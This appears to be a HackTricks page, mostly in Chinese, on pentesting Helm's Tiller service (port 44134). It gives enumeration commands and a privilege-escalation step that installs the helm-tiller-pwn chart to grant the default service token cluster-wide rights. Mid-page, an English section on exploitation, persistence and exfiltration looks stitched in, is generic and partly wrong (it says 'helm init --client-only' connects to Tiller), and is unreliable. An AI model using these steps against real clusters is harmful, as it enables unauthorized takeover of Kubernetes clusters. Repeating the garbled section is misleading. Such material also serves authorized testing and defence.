<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一个**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>


# 基本信息

Helm是Kubernetes的**包管理器**。它允许将YAML文件打包并分发到公共和私有仓库中。这些包被称为**Helm Charts**。**Tiller**是默认运行在端口44134上的**服务**。


**默认端口：** 44134
```
PORT      STATE SERVICE VERSION
44134/tcp open  unknown
```
# 枚举

如果你可以**枚举不同命名空间的Pod和/或服务**，请枚举它们并搜索名称中带有**"tiller"**的实例：
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
Examples:

## Reconnaissance

### Enumerate Tiller Service

To start the reconnaissance phase, we need to identify if the Tiller service is running on the target system. We can use the following command to check if the Tiller service is listening on the default port 44134:

```bash
nmap -p 44134 <target_ip>
```

If the Tiller service is running, we will see an open port 44134 in the scan results.

### Enumerate Tiller Releases

Once we have confirmed that the Tiller service is running, we can enumerate the available releases using the following command:

```bash
helm list
```

This command will display a list of all the releases managed by Tiller, along with their status, version, and other relevant information.

## Exploitation

### Exploit Tiller Service

If we have identified a vulnerable version of Tiller, we can exploit it to gain unauthorized access to the target system. One common vulnerability is the lack of authentication and authorization in older versions of Tiller.

To exploit this vulnerability, we can use the following command to establish a connection to the Tiller service:

```bash
helm init --client-only
```

This command will initialize the Helm client and establish a connection to the Tiller service. Once connected, we can use other Helm commands to interact with the target system.

### Exploit Tiller Releases

If we have identified a vulnerable release managed by Tiller, we can exploit it to gain unauthorized access to the target system. This can be done by leveraging known vulnerabilities in the specific release or misconfigurations in the deployment.

To exploit a vulnerable release, we need to first identify the specific version and any associated vulnerabilities. Once we have this information, we can use various techniques such as exploiting known vulnerabilities, privilege escalation, or lateral movement to gain unauthorized access.

## Post-Exploitation

### Maintain Access

After gaining unauthorized access to the target system, it is important to maintain access for future exploitation or data exfiltration. This can be achieved by creating a backdoor or establishing persistence mechanisms.

To maintain access, we can use techniques such as creating a new user account, modifying existing user accounts, or installing a remote access tool. These techniques will allow us to regain access to the target system even if our initial access is discovered and removed.

### Data Exfiltration

Once we have gained unauthorized access to the target system, we may want to exfiltrate sensitive data for further analysis or exploitation. This can be done by copying files, extracting databases, or using network protocols to transfer data to an external server.

To exfiltrate data, we need to identify the location of the sensitive data and the appropriate method for extraction. It is important to be cautious and minimize the impact on the target system to avoid detection.

## Conclusion

In this chapter, we have explored various techniques for pentesting Tiller and Helm. By performing reconnaissance, exploiting vulnerabilities, and maintaining access, we can gain unauthorized access to the target system and exfiltrate sensitive data. It is important to always follow ethical guidelines and obtain proper authorization before conducting any pentesting activities.
```bash
kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m
```
您还可以尝试通过检查端口44134来查找该服务是否正在运行：
```bash
sudo nmap -sS -p 44134 <IP>
```
一旦你发现了它，你可以通过下载客户端helm应用程序与之通信。你可以使用像`homebrew`这样的工具，或者查看[**官方发布页面**](https://github.com/helm/helm/releases)**。**有关更多详细信息或其他选项，请参阅[安装指南](https://v2.helm.sh/docs/using\_helm/#installing-helm)。

然后，你可以**枚举服务**：
```
helm --host tiller-deploy.kube-system:44134 version
```
## 提权

默认情况下，**Helm2**以**高权限**安装在**kube-system**命名空间中，因此如果您找到该服务并且可以访问它，这将允许您**提升权限**。

您只需要安装一个类似于这个的软件包：[**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn)，它将使**默认服务令牌可以访问整个集群中的所有内容**。
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
在[http://rui0.cn/archives/1573](http://rui0.cn/archives/1573)中，你可以找到**攻击的解释**，但基本上，如果你阅读_helm-tiller-pwn/pwnchart/templates/_目录下的[**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml)和[**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml)文件，你会看到**所有权限都被授予了默认令牌**。

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？想要在HackTricks中**宣传你的公司**吗？或者你想要**获取最新版本的PEASS或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>